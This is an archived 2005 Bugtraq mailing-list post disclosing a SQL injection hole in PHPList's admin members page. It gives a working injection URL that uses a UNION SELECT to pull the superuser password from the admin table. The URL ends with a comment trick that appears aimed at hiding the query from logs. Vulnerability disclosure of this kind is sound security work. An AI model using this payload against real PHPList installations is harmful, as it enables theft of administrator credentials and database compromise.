lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20050731230238.22060.qmail@securityfocus.com> Date: 31 Jul 2005 23:02:38 -0000 From: ziot@...taboutpp.com To: bugtraq@...urityfocus.com Subject: PHPList Vunerability http://example.com/lists/admin/?page=members&id=1%20union%20select%20null,password,null,null%20from%20phplist_admin%20where%20superuser=1/*sp_password Although not completely open because one must authenticate, but completely leaves the database open.. thus being a SQL Injection hole.